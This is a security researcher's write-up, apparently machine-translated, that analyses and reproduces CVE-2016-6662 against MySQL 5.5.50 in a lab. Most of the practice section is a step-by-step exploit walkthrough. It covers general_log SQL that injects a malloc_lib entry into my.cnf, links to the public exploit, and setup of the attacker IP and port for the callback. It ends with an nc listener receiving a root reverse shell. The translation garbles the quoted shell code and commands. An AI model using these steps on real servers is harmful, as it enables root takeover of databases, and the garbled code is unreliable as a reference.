Analysis and practice of MySQL remote code execution/extraction

0x00 background

On September 12, 2016, foreign security researcher Dawid Golunski issued a security bulletin to find a MySQL vulnerability that can be remote code execution/privilege elevation (CVE-2016-6662 ). After studying the original report, I made the following analysis and practices.

0x01 analysis

Vulnerability disclosure address: http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html

Scope of impact (updated by the vulnerability author on April 9, September 16 ):

MySQL <= 5.7.14

MySQL <= 5.6.32

MySQL <= 5.5.51

After the study of the original report, the summary is as follows.

Cause of the vulnerability:

1. MySQL's default installation package contains a mysqld_safe script to start mysql service processes, such:

2. This process can pre-load the shared library file before mysql server is started, and use the parameter-malloc-lib = LIB

/Usr/local/mysql/bin/mysqld_safe:

# Set_malloc_lib
#-If LIB is empty, do nothing and return
#-If LIB is 'tcmalloc ', look for tcmalloc shared library in/usr/lib
# Then pkglibdir. tcmalloc is part of the Google perftools project.
#-If LIB is an absolute path, assume it is a malloc shared library
#
# Put LIB in mysqld_ld_preload, which will be added to LD_PRELOAD when
# Running mysqld. See ld. so for details.
Set_malloc_lib (){
Malloc_lib = "$1"

If ["$ malloc_lib" = tcmalloc]; then
Pkglibdir = 'get _ mysql_config -- variable = pkglibdir'
Malloc_lib =
# This list is kept intentionally simple. Simply set -- malloc-lib
# To a full path if another location is desired.
For libdir in/usr/lib "$ pkglibdir" "$ pkglibdir/mysql"; do
For flavor in _ minimal ''_ and_profiler _ debug; do
Tmp = "$ libdir/libtcmalloc $ flavor. so"
# Log_notice "DEBUG: Checking for malloc lib '$ tmp '"
[-R "$ tmp"] | continue
Malloc_lib = "$ tmp"
Break 2
Done
Done

If [-z "$ malloc_lib"]; then
Log_error "no shared library for -- malloc-lib = tcmalloc found in/usr/lib or $ pkglibdir"
Exit 1
Fi
Fi
3. Shared library files can be added to a mysql configuration file my. cnf, such as the mysql data directory, $ DATADIR/my. cnf

/Usr/local/mysql/bin/mysqld_safe
:

# Try where the binary installput it
If test-d $ MY_BASEDIR_VERSION/data/mysql
Then
DATADIR = $ MY_BASEDIR_VERSION/data
If test-z "$ defaults"-a-r "$ DATADIR/my. cnf"
Then
Defaults = "-- defaults-extra-file = $ DATADIR/my. cnf"
Fi
# Next try where the source installput it
Elif test-d $ MY_BASEDIR_VERSION/var/mysql
Then
DATADIR = $ MY_BASEDIR_VERSION/var
# Or just give up and use our compiled-in default
Else
DATADIR =/usr/local/mysql/data
Fi
4. Once attackers can inject malicious library files into the my. cnf file, they can execute any code in any pre-loaded shared library with the root permission when the mysql service is restarted.

Condition for exploits:

Mysql users with FILE and SELECT permissions can access the log function (usually only the administrator of MYSQL has)

Use cases of vulnerabilities:

1. Inject malicious code into the configuration file (which can be written by MYSQL users) with weak permissions or insecure permission settings in mysql

2. Create a new configuration file my. cnf in the MYSQL data directory (which can be written by mysql users by default) and inject malicious code

How vulnerabilities are exploited:

1. Use the mysql logging function to create/modify the my. cnf file

Mysql> set global general_log_file = '/usr/local/mysql/data/my. cnf ';
Mysql> set global general_log = on;
Mysql> Select'
'>
'>; Injected config entry
'>
'> [Mysqld]
'> Malloc_lib =/tmp/mysql_exploit_lib.so
'>
'> [Separator]
'>
'> ';
1 row in set (0.00 sec)
Mysql> set global general_log = off;
2. Inject a sharing library containing malicious code and add it to the [mysqld] file of my. cnf, for example:

[Mysqld]
Malloc_lib = '/var/lib/mysql/mysql_hookandroot_lib.so'
3. Restart the mysql service to execute malicious code as root.

0x02 practices

Lab environment:

Ubuntu 16.04.1 LTS
MySQL 5.5.50
Practice steps:

1. MySQL installation and configuration: http://howtolamp.com/lamp/mysql/5.6/installing/

The directory after installation is as follows:

Root @ ubuntu:/home/avfisher # ls-l/usr/local/mysql/
Total 72
Drwxr-xr-x 2 mysql 4096 September 18 18:51 bin
-Rw-r -- 1 mysql 17987 May 16 17:46 COPYING
Drwx ------ 6 mysql 4096 September 18 17:46 data
Drwxr-xr-x 2 mysql 4096 September 13 23:58 docs
Drwxr-xr-x 3 mysql 4096 September 13 19:17 include
-Rw-r -- 1 mysql 301 May 16 17:46 INSTALL-BINARY
Drwxr-xr-x 3 mysql 4096 September 13 19:17 lib
Drwxr-xr-x 4 mysql 4096 September 13 19:17 man
Drwxr-xr-x 10 mysql 4096 September 13 19:17 mysql-test
-Rw-r -- 1 mysql 2496 May 16 17:46 README
Drwxr-xr-x 2 mysql 4096 September 13 19:17 scripts
Drwxr-xr-x 27 mysql 4096 September 13 19:17 share
Drwxr-xr-x 4 mysql 4096 September 13 23:02 SQL-statements
Drwxr-xr-x 2 mysql 4096 September 18 17:52 support-files
2. Download the exp file:

0ldSQL_MySQL_RCE_exploit.py: http://legalhackers.com/exploits/0ldSQL_MySQL_RCE_exploit.py
Mysql_hookandroot_lib.c: http://legalhackers.com/exploits/mysql_hookandroot_lib.c
3. Find the mysql data directory, such as/usr/local/mysql/data.

Root @ ubuntu:/home/avfisher # ps aux | grep mysqld_safe
Root 12592 0.0 0.0 4508 1780 pts/18 S/bin/sh/usr/local/mysql/bin/mysqld_safe -- datadir =/usr/local/mysql/data -- pid- file =/usr/local/mysql/data/ubuntu. pid
Root 13622 0.0 0.0 21296 940 pts/18 S + grep -- color = auto mysqld_saf
4. Modify the exp file

0ldSQL_MySQL_RCE_exploit.py: modify row 161 as follows (note: The function here is to write the mysql trigger file to the same directory of the test database)

TRG_path = "/usr/local/mysql/data/% s/poctable. TRG" % args. TARGET_DB
Mysql_hookandroot_lib.c: modify lines 63-65 as follows (the directory of my. cnf used here is/usr/local/mysql/data/my. cnf)

# Define ATTACKERS_IP "<IP address of your listener>"
# Define SHELL_PORT <your listening port>
# Define INJECTED_CONF "<my. cnf file in your mysql data Directory>"
5. Start the listener on the listener server.

[Root @ centos ~] # Nc-LV v 8080
Ncat: Version 6.40 (http://nmap.org/ncat)
Ncat: Listening on ::: 8080
Ncat: Listening on 0.0.0.0: 8080
6. Create test database users and databases

Create database pocdb;
Grant file on *. * TO 'attacker' @ '%' identified by 'p0cpass! ';
Grant select, INSERT, create on 'pocdb'. * TO 'attacker' @ '% ';
7. Execute the 0ldSQL_MySQL_RCE_exploit.py script as follows:

Root @ ubuntu:/home/avfisher # python 0ldSQL_MySQL_RCE_exploit.py-dbuser attacker-dbpass p0cpass! -Dbhost 127.0.0.1-dbname pocdb-mycnf/usr/local/mysql/data/my. cnf

0ldSQL_MySQL_RCE_exploit.py (ver. 1.0)
MySQL Remote Root Code Execution/Privesc PoC Exploit (CVE-2016-6662)

For testing purposes only. Do no harm.

Discovered/Coded:

Dawid Golunski
Http://legalhackers.com

[+] Connecting to target server 127.0.0.1 and target mysql account 'attacker @ 127.0.0.1 'using DB 'pocdb'

[+] The account in use has the following grants/perms:

Grant file on *. * TO 'attacker' @ '%' identified by password <secret>
Grant select, INSERT, create on 'pocdb'. * TO 'attacker' @ '%'

[+] Compiling mysql_hookandroot_lib.so

[+] Converting mysql_hookandroot_lib.so into HEX

[+] Saving trigger payload into/usr/local/mysql/data/pocdb/poctable. TRG

[+] Dumping shared library into/var/lib/mysql/mysql_hookandroot_lib.so file on the target

[+] Creating table 'poctable' so that injected 'poctable. Trg' trigger gets loaded

[+] Inserting data to 'poctable' in order to execute the trigger and write data to the target mysql config/usr/local/mysql/data/my. cnf

[+] Showing the contents of/usr/local/mysql/data/my. cnf config to verify that our setting (malloc_lib) got injected

...
[+] Looks messy? Have no fear, the preloaded lib mysql_hookandroot_lib.so will clean up all the mess before mysqld daemon even reads it :)

[+] Everything is set up and ready. Spawning netcat listener and waiting for MySQL daemon to get restarted to get our rootshell ...:)

...
8. Restart the mysql service to trigger the exploitation.

Root @ ubuntu:/home/avfisher #/usr/local/mysql/support-files/mysql. server restart
9. The listener server successfully receives a bounce shell

[Root @ centos ~] # Nc-LV v 8080
Ncat: Version 6.40 (http://nmap.org/ncat)
Ncat: Listening on ::: 8080
Ncat: Listening on 0.0.0.0: 8080
Ncat: Connection from 192.168.1.92.
Ncat: Connection from 192.168.1.92: 46192.
Root @ ubuntu:/usr/local/mysql # id
Id
Uid = 0 (root) gid = 0 (root) groups = 0 (root)
0x03 summary

During the testing and practice of this vulnerability, I have the following experiences and experiences:

1. The vulnerability author cleverly used the trigger to allow a common user to use the root permission to execute the required SQL statements, thus successfully bypassing mysql's permission restrictions for general_log_file file operations

2. the vulnerability author provides a good way to rebound shell, that is, to load my by using preload before mysqld starts. the cnf file order was modified before mysqld. the redundancy information in the cnf file ensures the normal startup of mysql service.

3. About the permissions of the my. cnf file in the mysql data directory, chown mysql: mysql my. cnf is not required at all, as long as the following two conditions are met:

Database User mysql has writable permission on my. cnf
My. cnf is not the world-write permission